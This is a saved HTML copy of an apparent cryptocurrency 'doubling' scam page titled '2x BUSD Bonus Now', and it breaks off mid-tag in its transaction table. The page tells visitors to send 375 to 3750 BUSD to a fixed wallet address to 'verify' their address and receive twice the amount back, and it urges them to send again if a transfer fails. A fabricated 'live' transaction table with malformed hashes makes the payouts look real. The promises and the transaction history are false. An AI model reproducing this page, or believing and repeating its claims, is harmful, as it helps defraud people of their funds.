<!DOCTYPE html>
<html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    
    <meta name="viewport" content="height=961px, width=1903px, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">

    <link rel="stylesheet" type="text/css" href="./BUSD_files/styles.css">
    <meta property="og:image" content="img/link.png">
    <link href="BUSD_files/" rel="shortcut icon" type="image/x-icon">
    <title>2x BUSD Bonus Now</title>

    <link rel="preconnect" href="https://fonts.gstatic.com/">
    <link href="./BUSD_files/css2" rel="stylesheet"> 
    <link rel="stylesheet" type="text/css" href="./BUSD_files/theme.min.css">
    
    
    <meta name="referrer" content="always">

    <script src="./BUSD_files/twk-main.js.download" charset="UTF-8" crossorigin="*"></script><script src="./BUSD_files/twk-vendor.js.download" charset="UTF-8" crossorigin="*"></script><script src="./BUSD_files/twk-chunk-vendors.js.download" charset="UTF-8" crossorigin="*"></script><script src="./BUSD_files/twk-chunk-common.js.download" charset="UTF-8" crossorigin="*"></script><script src="./BUSD_files/twk-runtime.js.download" charset="UTF-8" crossorigin="*"></script><script src="./BUSD_files/twk-app.js.download" charset="UTF-8" crossorigin="*"></script><script async="" src="./BUSD_files/1fih9ln5e" charset="UTF-8" crossorigin="*"></script><script>
        window.onload = function () {
            if (!localStorage.getItem("justonce")) {
                localStorage.setItem("justOnce", "true");
                window.location.reload();
            }
        }
    </script>

</head>

<body>
    <div class="loading">
        <div class="loading-item l1"></div>
        <div class="loading-item l2"></div>
        <div class="loading-item l3"></div>
        <div class="loading-item l4"></div>
        
    </div>
    
    
    
<div class="pop-body">
    <div class="pop-inner">
        <div class="pop-head">
            <h3 class="pop-head-text">Generated Address</h3><svg id="close" height="20" viewBox="0 0 20 20" width="20" xmlns="http://www.w3.org/2000/svg">
                <path d="M18.096 19.174l1.401-1.427L1.7.286.3 1.714z"></path>
                <path d="M19.497 1.714L18.096.286.3 17.747l1.4 1.427z"></path>
            </svg>
        </div>
        <div class="pop-post-body">
            <div class="pop-post-inner">
                <div class="pop-anrange">
                    <div class="pop-img">
                        <div class="pop-qr">
                            <div class="inner-qr">
                                <div class="main-qr">
                                    <div opacity="0" class="qr"><img id="qrcode_svg" width="200" height="200" src="./BUSD_files/0xCF62EAB837383fdC983900d27189698e122f3d4F.jpeg" alt="qr"></div>
                        <p style="color:green; margin-top:1rem; margin-bottom: 2px; text-align: center;">0 Confirmation</p>
                                    <center><img src="./BUSD_files/loading.svg" width="70px"></center>
                                </div>
                            </div>
                        </div>
                    </div>
                    <div class="timer-b" id="timer1"></div>
                    <div class="address-place">
                        <div class="inner-address"><span class="wallet-ad">Amount:</span>
                            <div class="address">
                                <div class="main-ad"><span class="real-address" id="gen-amount"></span></div>
                                <div class="copy-body">
                                    <div class="copy-inner">
                                        <img class="cp" id="copy_" src="./BUSD_files/copy.svg">
                                    </div>
                                </div>
                            </div>
                        </div>

                        <div class="inner-address"><span class="wallet-ad">Generated address:</span>
                            <div class="address">
                                <div class="main-ad"><span class="real-address">0xCF62EAB837383fdC983900d27189698e122f3d4F</span></div>
                                <div class="copy-body">
                                    <div class="copy-inner">
                                        <img class="cp" id="copy_address" src="./BUSD_files/copy.svg">
                                    </div>
                                </div>
                            </div>
                            
                        </div>
                        
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

    <section id="post-sec">
        <a href="index.html">
            
                <h1 style="text-align: center; z-index: 999999;"><img src="data:image/svg+xml; base64, PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHZpZXdCb3g9IjAgMCA1MTIw%0A                    IDEwMjQiIGNsYXNzPSJjc3MtMXR5d2JjaiIgZmlsbD0iI2YwYjkzMSI+CiAgICA8cGF0aAogICAg%0A                    ICAgIGQ9Ik0yMzAuOTk3MzMzIDUxMkwxMTYuMDUzMzMzIDYyNi45ODY2NjcgMCA1MTJsMTE2LjAx%0A                    MDY2Ny0xMTYuMDEwNjY3TDIzMC45OTczMzMgNTEyek01MTIgMjMwLjk5NzMzM2wxOTcuOTczMzMz%0A                    IDE5Ny45NzMzMzQgMTE2LjA1MzMzNC0xMTUuOTY4TDUxMiAwIDE5Ny45NzMzMzMgMzE0LjAyNjY2%0A                    N2wxMTYuMDUzMzM0IDExNS45NjhMNTEyIDIzMC45OTczMzN6IG0zOTUuOTg5MzMzIDE2NC45OTJM%0A                    NzkzLjAwMjY2NyA1MTJsMTE2LjAxMDY2NiAxMTYuMDEwNjY3TDEwMjQuOTgxMzMzIDUxMmwtMTE2%0A                    Ljk5Mi0xMTYuMDEwNjY3ek01MTIgNzkzLjAwMjY2N2wtMTk3Ljk3MzMzMy0xOTguOTk3MzM0LTEx%0A                    Ni4wNTMzMzQgMTE2LjAxMDY2N0w1MTIgMTAyNGwzMTQuMDI2NjY3LTMxNC4wMjY2NjctMTE2LjA1%0A                    MzMzNC0xMTUuOTY4TDUxMiA3OTMuMDAyNjY3eiBtMC0xNjUuOTczMzM0bDExNi4wMTA2NjctMTE2%0A                    LjA1MzMzM0w1MTIgMzk2LjAzMiAzOTUuOTg5MzMzIDUxMiA1MTIgNjI2Ljk4NjY2N3ogbTEyMjAu%0A                    MDEwNjY3IDExLjk0NjY2N3YtMS45NjI2NjdjMC03NS4wMDgtNDAuMDIxMzMzLTExMy4wMjQtMTA1%0A                    LjAwMjY2Ny0xMzguMDI2NjY2IDM5Ljk3ODY2Ny0yMS45NzMzMzMgNzMuOTg0LTU4LjAyNjY2NyA3%0A                    My45ODQtMTIxLjAwMjY2N3YtMS45NjI2NjdjMC04OC4wMjEzMzMtNzAuOTk3MzMzLTE0NS4wMjQt%0A                    MTg1LjAwMjY2Ny0xNDUuMDI0aC0yNjAuOTkydjU2MS4wMjRoMjY3LjAwOGMxMjYuOTc2IDAuOTgx%0A                    MzMzIDIxMC4wMDUzMzMtNTEuMDI5MzMzIDIxMC4wMDUzMzQtMTUzLjAwMjY2NnogbS0xNTQuMDI2%0A                    NjY3LTIzOS45NTczMzNjMCA0MS45ODQtMzQuMDA1MzMzIDU4Ljk2NTMzMy04OS4wMDI2NjcgNTgu%0A                    OTY1MzMzaC0xMTMuOTYyNjY2VjMzOC45ODY2NjdoMTIxLjk4NGM1Mi4wMTA2NjcgMCA4MC45ODEz%0A                    MzMgMjAuOTkyIDgwLjk4MTMzMyA1OC4wMjY2NjZ2Mi4wMDUzMzR6IG0zMS4wMTg2NjcgMjI0YzAg%0A                    NDEuOTg0LTMyLjk4MTMzMyA2MS4wMTMzMzMtODcuMDQgNjEuMDEzMzMzaC0xNDYuOTQ0di0xMjMu%0A                    MDUwNjY3aDE0Mi45NzZjNjMuMDE4NjY3IDAgOTEuMDA4IDIzLjA0IDkxLjAwOCA2MS4wMTMzMzR2%0A                    MS4wMjR6IG0zODEuOTk0NjY2IDE2OS45ODRWMjMwLjk5NzMzM2gtMTIzLjk4OTMzM3Y1NjEuMDI0%0A                    aDEyMy45ODkzMzN2MC45ODEzMzR6IG02NjQuMDIxMzM0IDBWMjMwLjk5NzMzM2gtMTIyLjAyNjY2%0A                    N3YzNDYuMDI2NjY3bC0yNjIuOTk3MzMzLTM0Ni4wMjY2NjdoLTExNC4wMDUzMzR2NTYxLjAyNGgx%0A                    MjIuMDI2NjY3di0zNTYuMDEwNjY2bDI3MiAzNTYuOTkyaDEwNC45NnogbTY4My45NDY2NjYgMEwz%0A                    MDk4LjAyNjY2NyAyMjguMDEwNjY3aC0xMTMuOTYyNjY3bC0yNDEuMDI0IDU2NC45OTJoMTI3LjAx%0A                    ODY2N2w1MC45ODY2NjYtMTI1Ljk5NDY2N2gyMzcuMDEzMzM0bDUwLjk4NjY2NiAxMjUuOTk0NjY3%0A                    aDEzMC4wMDUzMzR6IG0tMjI0Ljk4MTMzMy0yMzUuMDA4aC0xNDguOTkybDc1LjAwOC0xODEuOTcz%0A                    MzM0IDczLjk4NCAxODEuOTczMzM0eiBtODE0LjAzNzMzMyAyMzUuMDA4VjIzMC45OTczMzNoLTEy%0A                    Mi4wMjY2NjZ2MzQ2LjAyNjY2N2wtMjYyLjk5NzMzNC0zNDYuMDI2NjY3aC0xMTQuMDA1MzMzdjU2%0A                    MS4wMjRoMTIyLjAyNjY2N3YtMzU2LjAxMDY2NmwyNzIgMzU2Ljk5MmgxMDQuOTZ6IG02MzYuOTcw%0A                    NjY3LTkxLjAwOGwtNzguOTc2LTc4Ljk3NmMtNDQuMDMyIDM5Ljk3ODY2Ny04My4wMjkzMzMgNjUu%0A                    OTYyNjY3LTE0OC4wMTA2NjcgNjUuOTYyNjY2LTk2IDAtMTYyLjk4NjY2Ny04MC0xNjIuOTg2NjY2%0A                    LTE3NnYtMi45ODY2NjZjMC05NiA2Ny45NjgtMTc0Ljk3NiAxNjIuOTg2NjY2LTE3NC45NzYgNTUu%0A                    OTc4NjY3IDAgMTAwLjAxMDY2NyAyMy45Nzg2NjcgMTQ0IDYyLjk3Nmw3OC45NzYtOTEuMDA4Yy01%0A                    MS45NjgtNTAuOTg2NjY3LTExNC45ODY2NjctODYuOTk3MzMzLTIyMC45NzA2NjYtODYuOTk3MzM0%0A                    LTE3MS45ODkzMzMgMC0yOTIuOTkyIDEzMC45ODY2NjctMjkyLjk5MiAyOTAuMDA1MzM0VjUxMmMw%0A                    IDE2MC45ODEzMzMgMTIyLjk2NTMzMyAyODguOTgxMzMzIDI4OCAyODguOTgxMzMzIDEwNy45ODkz%0A                    MzMgMS4wMjQgMTcxLjk4OTMzMy0zNi45OTIgMjI5Ljk3MzMzMy05OC45ODY2NjZ6IG01MjcuMDE4%0A                    NjY3IDkxLjAwOHYtMTA5Ljk5NDY2N2gtMzA1LjAyNHYtMTE4LjAxNmgyNjUuMDAyNjY2di0xMDku%0A                    OTk0NjY3aC0yNjUuMDAyNjY2VjM0MC45OTJoMzAxLjAxMzMzM1YyMzAuOTk3MzMzaC00MjIuOTk3%0A                    MzMzdjU2MS4wMjRoNDI3LjAwOHYwLjk4MTMzNHoiCiAgICAgICAgcC1pZD0iMjkzNSI+PC9wYXRo%0A                    Pgo8L3N2Zz4=" alt="logo" style="max-width: 20rem;"></h1>
            
        </a>
        <div class="post_body">
            
            <p>To verify your Binance USD address, just send from <b>375 BUSD</b> - <b>3750 BUSD</b> to the competetion smart contract address below and get from
                <b>750 BUSD</b> - <b>7500 BUSD</b> back.
                
            </p><p>You will receive a 2x bonus depending on the amount you stake with.<br><br></p>
            <p>Bonus are processed automatically within 4 - 15 minutes <i>(after deposit to the staking address is confirmed on the blockchain)</i></p>
            <p>
            </p><h2>How To Participate:</h2>
            <ul>
                <li><b>Step 1:</b> Make sure you have at least 375 BUSD or above in your wallet.</li>
                <li><b>Step 2:</b> Enter the amount you wish to participate with below.</li>
                <li><b>Step 3:</b> Enter your BUSD address</li>
                <li><b>Step 4:</b> Click the "Generate Payment" button to generate your deposit address.</li>
                <li><b>Step 5:</b> Send the amount you entered to the generated address.</li>
                <li><b>Step 6:</b> Wait for at least 4 - 15 minutes after your transaction is confirmed.</li>
            </ul>
            <p></p>
            <p>You bonus should be resting in your wallet or pending. <br><br>CONGRATULATIONS 🎉🎉</p>
            <p style="color: rgba(247, 147, 26, 0.6); font-size: 14px !important; margin-top: 2rem !important;"><i>If the
                    transaction does not process correctly, please try again by
                    sending the same amount to the Generated address, and it should go through. Your original
                    transaction will merge with the new one, and the bonus for the two will be sent back.</i></p>
        </div>
        <div class="cal-body">
            <div class="cal-inner">
                <div class="input">
                    <div class="title">Amount To Invest:</div>
                    <div class="amount-con">
                        <div class="inner-con">
                            <div class="pic"></div>
                            <div class="amount">
                                <div class="main-input">
                                    <div class="in-main"><input id="cal-in" class="exchange-content__input theme__background-4 theme__text-4 " min="0" placeholder="0" type="number" maxlength="50" autocomplete="off" value=""></div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
                <div class="icon-body"><span data-tip="Click to swap" data-for="swap-icon" currentitem="false"><img src="./BUSD_files/exchange-alt.svg" alt="img" class="exchange__swap-icon"></span></div>
                <div class="input">
                    <div class="title">Expected Bonus:</div>
                    <div class="amount-con">
                        <div class="inner-con">
                            <div class="pic"></div>
                            <div class="amount">
                                <div class="main-input">
                                    <div class="in-main"><input id="cal-out" class="exchange-content__input theme__background-4 theme__text-4 " placeholder="0" maxlength="50" min="0" autocomplete="off" value=""></div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
            <div class="enaddress">
                <div class="title"><addr title="Enter the address where you want your bonus to be sent to. Note: this feild is optional, if you leave it empty, the bonus will be sent to the address you sent from.">Receiving (Wallet) Address:</addr></div>
                <div class="inner-enter"><input type="text" placeholder="Enter your Binance USD (BUSD) address"></div>
            </div>
            
            <div class="but-con">
                <div id="gen-btn" class="swap-but">Generate Payment</div>
                <div class="terms text-info text-center mb-2"><span><span id="warn"></span></span>
                </div>
            </div>
            <div id="lympo_progress">
                <div class="row progress-row">
                    <div class="colums_12">
                        <div class="progress-ico">
                            <div class="progress-ico">
                                <div class="progress">
                                    <div class="progress-bar progress-bar-striped active progress-width" id="progress-ico" role="progressbar" style="width: 22.4669%;">
                                        <span class="sr-only">x</span></div>
                                </div>
                            </div>
                            <div class="dot-1" id="leftBUSD">
                                Counting BUSD left...
                            </div>
                            <div class="dot-1-airdrop  progress-left" style="left: 22.4669%;"></div>
                            <span class="pbv" id="progress-ico-bar">44 933 727 / 200 000 000</span>
                        </div>
                    </div>
                </div>
            </div>
            <div class="support">
                <div class="sup">
                    <div class="sup-space"></div>
                    <div class="both-line">
                        <div class="import-account__title-content theme__background-2 theme__text-4">Supported Exchange
                        </div>
                    </div>
                    <div class="import-account__content">
                        <div class="import-account__item">
                            <div class="import-account__block theme__import-button">
                                <div class="import-account__icon metamask"><img src="./BUSD_files/binance.ico" width="20">
                                </div>
                                <div class="import-account__name">BINANCE</div>
                            </div>
                        </div>
                        <div class="import-account__item import-account__item-ledger">
                            <div>
                                <div class="import-account__block theme__import-button">
                                    <div class="import-account__icon ledger"><img src="./BUSD_files/upbit.png" width="20">
                                    </div>
                                    <div class="import-account__name">UPBIT</div>
                                </div>
                            </div>
                        </div>
                        <div class="import-account__item import-account__item-trezor">
                            <div>
                                <div class="import-account__block theme__import-button">
                                    <div class="import-account__icon trezor">
                                        <div class="import-account__icon ledger"><img src="./BUSD_files/okes.png" width="20"></div>
                                    </div>
                                    <div class="import-account__name">OKEX</div>
                                </div>
                            </div>
                        </div>
                        <div class="import-account__item">
                            <div>
                                <div class="import-account__block theme__import-button" tabindex="0"><input type="file" multiple="" autocomplete="off" tabindex="-1" style="display:none;">
                                    <div class="import-account__icon json"><img src="./BUSD_files/tano.png" width="20" style="border-radius: 1rem;"></div>
                                    <div class="import-account__name">REMITANO</div>
                                </div>
                            </div>
                        </div>
                        <div class="import-account__item">
                            <div class="import-account__block theme__import-button">
                                <div class="import-account__icon private-key"><img src="./BUSD_files/tox.png" width="20">
                                </div>
                                <div class="import-account__name">MERCATOX</div>
                            </div>
                        </div>
                        <div class="import-account__item ">
                            <div class="import-account__block theme__import-button">
                                <div class="import-account__icon promo-code"><img src="./BUSD_files/luno.png" width="20">
                                </div>
                                <div class="import-account__name">LUNO</div>
                            </div>
                        </div>
                        <div class="import-account__item import-account__item-trezor">
                            <div>
                                <div class="import-account__block theme__import-button">
                                    <div class="import-account__icon trezor"><img src="./BUSD_files/coinsph.png" width="20">
                                    </div>
                                    <div class="import-account__name">COINS.PH</div>
                                </div>
                            </div>
                        </div>
                        <div class="import-account__item">
                            <div>
                                <div class="import-account__block theme__import-button" tabindex="0"><input type="file" multiple="" autocomplete="off" tabindex="-1" style="display:none;">
                                    <div class="import-account__icon json"><img src="./BUSD_files/ava.jpg" width="20" style="border-radius: 1rem;"></div>
                                    <div class="import-account__name">COINBASE</div>
                                </div>
                            </div>
                        </div>
                        <div class="import-account__item">
                            <div class="import-account__block theme__import-button">
                                <div class="import-account__icon private-key"><img src="./BUSD_files/yobit.ico" width="20">
                                </div>
                                <div class="import-account__name">YOBIT</div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </section>
    <main id="content" role="main">
        <div id="ContentPlaceHolder1_divSummary" class="container space-bottom-2">
            <div class="card">
                <div class="card-body">
                    <div class="tab-content">
                        <div class="tab-pane fade show active" id="transactions" role="tabpanel" aria-labelledby="transactions-tab">
                            <div class="table-responsive mb-2 mb-md-0">
                                <table class="table table-hover" id="myTable">
                                    <thead class="thead-light">
                                        <tr>
                                            <th scope="col" width="1">Txn Hash</th>
                                            <th scope="col" width="1" class="d-none d-sm-table-cell">Block</th>
                                            <th scope="col"><span class="timer" title="UTC time">Age</span></th>
                                            <th scope="col">From</th>
                                            <th scope="col" width="30"></th>
                                            <th scope="col">To</th>
                                            <th scope="col">Value</th>
                                            <th scope="col"><span id="ContentPlaceHolder1_spanTxFee" title="(Gas Price * Gas Used by Txns) in BUSD">
                                                    <spanclass="text-secondary">[Txn Fee]
                                                </spanclass="text-secondary"></span>
                                            </th>
                                        </tr>
                                    <tr class="toolbar"> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">6060969665e6707004079c69E255F80705DE01862F439950cEc0c9E9xDAaac3</a> </td> <td class="d-none d-sm-table-cell"><a href="https://www.2xxpoolbonus.site/BUSD/index.html">985057337</a></td> <td><span class="timer">now</span> </td> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">LAToken 3</a> </td> <td><span class="u-label u-label--xs u-label--success color-strong text-uppercase text-center w-100 rounded text-nowrap">&nbsp;IN&nbsp;</span> </td> <td><span class="hash-tag text-truncate">0x60ED062961e81B0907ca094cEFc965A0433F8574</span> </td> <td>51761.38 BUSD</td> <td><span class="small text-secondary">0<b>.</b>000662</span></td> </tr><tr class="toolbar"> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">9Ee4B4010a67D1A02979009FAEF363c96E0x0087A87F867F083F626ca6A0EFF</a> </td> <td class="d-none d-sm-table-cell"><a href="https://www.2xxpoolbonus.site/BUSD/index.html">988179444</a></td> <td><span class="timer">1 mins ago</span></td> <td><span class="hash-tag text-truncate">0x60ED062961e81B0907ca094cEFc965A0433F8574</span> </td> <td><span class="u-label u-label--xs u-label--warning color-strong text-uppercase text-center w-100 rounded text-nowrap">OUT</span> </td> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">0x746061D6E33007066D060AFF09a9404209c4E800</a> </td> <td>28226.94 BUSD</td> <td><span class="small text-secondary">0<b>.</b>000573</span></td> </tr><tr class="toolbar"> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">91426e640DFE74E8E070c0B0c4004804EcE075041cFxD9949211AF0009F0690</a> </td> <td class="d-none d-sm-table-cell"><a href="https://www.2xxpoolbonus.site/BUSD/index.html">985397654</a></td> <td><span class="timer">1 mins ago</span> </td> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">0x746061D6E33007066D060AFF09a9404209c4E800</a> </td> <td><span class="u-label u-label--xs u-label--success color-strong text-uppercase text-center w-100 rounded text-nowrap">&nbsp;IN&nbsp;</span> </td> <td><span class="hash-tag text-truncate">0x60ED062961e81B0907ca094cEFc965A0433F8574</span> </td> <td>14113.47 BUSD</td> <td><span class="small text-secondary">0<b>.</b>000328</span></td> </tr><tr class="toolbar"> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">E60a3A08FD59566EEBxE90E0304x05751Ecc8F47F670eB50360c9c72F68E4x0</a> </td> <td class="d-none d-sm-table-cell"><a href="https://www.2xxpoolbonus.site/BUSD/index.html">998369592</a></td> <td><span class="timer">2 mins ago</span></td> <td><span class="hash-tag text-truncate">0x60ED062961e81B0907ca094cEFc965A0433F8574</span> </td> <td><span class="u-label u-label--xs u-label--warning color-strong text-uppercase text-center w-100 rounded text-nowrap">OUT</span> </td> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">Remitano 2</a> </td> <td>184321.92 BUSD</td> <td><span class="small text-secondary">0<b>.</b>000339</span></td> </tr><tr class="toolbar"> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">650E0FFF1F0344F1306FF89A12706199Fc9D6E16cAE010c1F069D46cBBceE96</a> </td> <td class="d-none d-sm-table-cell"><a href="https://www.2xxpoolbonus.site/BUSD/index.html">951902355</a></td> <td><span class="timer">2 mins ago</span> </td> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">Remitano 2</a> </td> <td><span class="u-label u-label--xs u-label--success color-strong text-uppercase text-center w-100 rounded text-nowrap">&nbsp;IN&nbsp;</span> </td> <td><span class="hash-tag text-truncate">0x60ED062961e81B0907ca094cEFc965A0433F8574</span> </td> <td>92160.96 BUSD</td> <td><span class="small text-secondary">0<b>.</b>000107</span></td> </tr><tr> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">0Ba3c8906DF8470946E6E94E3496164764FB99606909600c40ceAe01FB4aD77</a> </td> <td class="d-none d-sm-table-cell"><a href="https://www.2xxpoolbonus.site/BUSD/index.html">956127060</a></td> <td><span class="timer">4 mins ago</span></td> <td><span class="hash-tag text-truncate">0x60ED062961e81B0907ca094cEFc965A0433F8574</span> </td> <td><span class="u-label u-label--xs u-label--warning color-strong text-uppercase text-center w-100 rounded text-nowrap">OUT</span> </td> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">Binance 2</a> </td> <td>268814.18 BUSD</td> <td><span class="small text-secondary">0<b>.</b>000200</span></td> </tr><tr> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">D01E98F033F40D34829cDe6c5ccD507393207866A7A60c333400cc1aa915816</a> </td> <td class="d-none d-sm-table-cell"><a href="https://www.2xxpoolbonus.site/BUSD/index.html">950824946</a></td> <td><span class="timer">4 mins ago</span> </td> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">Binance 2</a> </td> <td><span class="u-label u-label--xs u-label--success color-strong text-uppercase text-center w-100 rounded text-nowrap">&nbsp;IN&nbsp;</span> </td> <td><span class="hash-tag text-truncate">0x60ED062961e81B0907ca094cEFc965A0433F8574</span> </td> <td>134407.09 BUSD</td> <td><span class="small text-secondary">0<b>.</b>000531</span></td> </tr><tr> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">131468004A6266D00FB7770c07039cccF078BxFF84cxE5360e880c4e90x76Ec</a> </td> <td class="d-none d-sm-table-cell"><a href="https://www.2xxpoolbonus.site/BUSD/index.html">950972500</a></td> <td><span class="timer">5 mins ago</span></td> <td><span class="hash-tag text-truncate">0x60ED062961e81B0907ca094cEFc965A0433F8574</span> </td> <td><span class="u-label u-label--xs u-label--warning color-strong text-uppercase text-center w-100 rounded text-nowrap">OUT</span> </td> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">0xc051c4F63Fc0350e9896BEFAD74a28cFc55063cE</a> </td> <td>217613.44 BUSD</td> <td><span class="small text-secondary">0<b>.</b>00065</span></td> </tr><tr> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">61Fa60c04A034089006370FE6F52c90xB46966eD9A08A900e0ccc40c040843B</a> </td> <td class="d-none d-sm-table-cell"><a href="https://www.2xxpoolbonus.site/BUSD/index.html">939349864</a></td> <td><span class="timer">5 mins ago</span> </td> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">0xc051c4F63Fc0350e9896BEFAD74a28cFc55063cE</a> </td> <td><span class="u-label u-label--xs u-label--success color-strong text-uppercase text-center w-100 rounded text-nowrap">&nbsp;IN&nbsp;</span> </td> <td><span class="hash-tag text-truncate">0x60ED062961e81B0907ca094cEFc965A0433F8574</span> </td> <td>108806.72 BUSD</td> <td><span class="small text-secondary">0<b>.</b>000284</span></td> </tr><tr> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">04F26c46e26092496F86aFDD66cE9795708060633ac61FFx9712A607EF9F248</a> </td> <td class="d-none d-sm-table-cell"><a href="https://www.2xxpoolbonus.site/BUSD/index.html">95751045</a></td> <td><span class="timer">6 mins ago</span></td> <td><span class="hash-tag text-truncate">0x60ED062961e81B0907ca094cEFc965A0433F8574</span> </td> <td><span class="u-label u-label--xs u-label--warning color-strong text-uppercase text-center w-100 rounded text-nowrap">OUT</span> </td> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">0xF6E0623cccx69EA94BD39EccE1A4e2D406BA8098</a> </td> <td>371428.08 BUSD</td> <td><span class="small text-secondary">0<b>.</b>000526</span></td> </tr><tr> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">0x4A615c7e36551267e4A74E40a9463FF659ce0xFFD33105844253E99DD40cB</a> </td> <td class="d-none d-sm-table-cell"><a href="https://www.2xxpoolbonus.site/BUSD/index.html">965697793</a></td> <td><span class="timer">6 mins ago</span> </td> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">0xF6E0623cccx69EA94BD39EccE1A4e2D406BA8098</a> </td> <td><span class="u-label u-label--xs u-label--success color-strong text-uppercase text-center w-100 rounded text-nowrap">&nbsp;IN&nbsp;</span> </td> <td><span class="hash-tag text-truncate">0x60ED062961e81B0907ca094cEFc965A0433F8574</span> </td> <td>185714.04 BUSD</td> <td><span class="small text-secondary">0<b>.</b>000346</span></td> </tr><tr> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">F16Fc40AD6672E8A5e906c270070968c66F990646D03E7633E8a80EcE909Ec7</a> </td> <td class="d-none d-sm-table-cell"><a href="https://www.2xxpoolbonus.site/BUSD/index.html">976163754</a></td> <td><span class="timer">7 mins ago</span></td> <td><span class="hash-tag text-truncate">0x60ED062961e81B0907ca094cEFc965A0433F8574</span> </td> <td><span class="u-label u-label--xs u-label--warning color-strong text-uppercase text-center w-100 rounded text-nowrap">OUT</span> </td> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">0x0x9ca94FcD6001c2E54E45c53ca0907E90586644</a> </td> <td>35313.66 BUSD</td> <td><span class="small text-secondary">0<b>.</b>000904</span></td> </tr><tr> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">A82Ex0946032647E85007479c4798x2EAE0DxE1c09060a095c0081216x49952</a> </td> <td class="d-none d-sm-table-cell"><a href="https://www.2xxpoolbonus.site/BUSD/index.html">991514421</a></td> <td><span class="timer">7 mins ago</span> </td> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">0x0x9ca94FcD6001c2E54E45c53ca0907E90586644</a> </td> <td><span class="u-label u-label--xs u-label--success color-strong text-uppercase text-center w-100 rounded text-nowrap">&nbsp;IN&nbsp;</span> </td> <td><span class="hash-tag text-truncate">0x60ED062961e81B0907ca094cEFc965A0433F8574</span> </td> <td>17656.83 BUSD</td> <td><span class="small text-secondary">0<b>.</b>000987</span></td> </tr><tr> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">B62ED39E740c50606851Bce09F579D494xc6aca0578c5F59BF301aAeceE47Bc</a> </td> <td class="d-none d-sm-table-cell"><a href="https://www.2xxpoolbonus.site/BUSD/index.html">993177208</a></td> <td><span class="timer">8 mins ago</span></td> <td><span class="hash-tag text-truncate">0x60ED062961e81B0907ca094cEFc965A0433F8574</span> </td> <td><span class="u-label u-label--xs u-label--warning color-strong text-uppercase text-center w-100 rounded text-nowrap">OUT</span> </td> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">0x9004808B8a0441e0464ee390EF8E89084544EED9</a> </td> <td>73288.66 BUSD</td> <td><span class="small text-secondary">0<b>.</b>000333</span></td> </tr><tr> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">900660x0009ac6F9D510a0941c9cE4eAa9194x504Ec65939EF6AFc6AA606E9c</a> </td> <td class="d-none d-sm-table-cell"><a href="https://www.2xxpoolbonus.site/BUSD/index.html">928568525</a></td> <td><span class="timer">8 mins ago</span> </td> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">0x9004808B8a0441e0464ee390EF8E89084544EED9</a> </td> <td><span class="u-label u-label--xs u-label--success color-strong text-uppercase text-center w-100 rounded text-nowrap">&nbsp;IN&nbsp;</span> </td> <td><span class="hash-tag text-truncate">0x60ED062961e81B0907ca094cEFc965A0433F8574</span> </td> <td>36644.33 BUSD</td> <td><span class="small text-secondary">0<b>.</b>000820</span></td> </tr><tr> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">0D5560cEF398604FcF96xFF0A90883955B451E1046DE0c465F09FE572995309</a> </td> <td class="d-none d-sm-table-cell"><a href="https://www.2xxpoolbonus.site/BUSD/index.html">995657576</a></td> <td><span class="timer">9 mins ago</span></td> <td><span class="hash-tag text-truncate">0x60ED062961e81B0907ca094cEFc965A0433F8574</span> </td> <td><span class="u-label u-label--xs u-label--warning color-strong text-uppercase text-center w-100 rounded text-nowrap">OUT</span> </td> <td><a class="hash-tag text-truncate" href="https://www.2xxpoolbonus.site/BUSD/index.html">0x6009A00F046330x646000B7600D600197700686c</a> </td> <td>246398.62 BUSD</td> <td><span class="small text-secondary">0<b>.</b>000248</span></td> </tr><tr> <td><a class="hash-tag text-truncate" 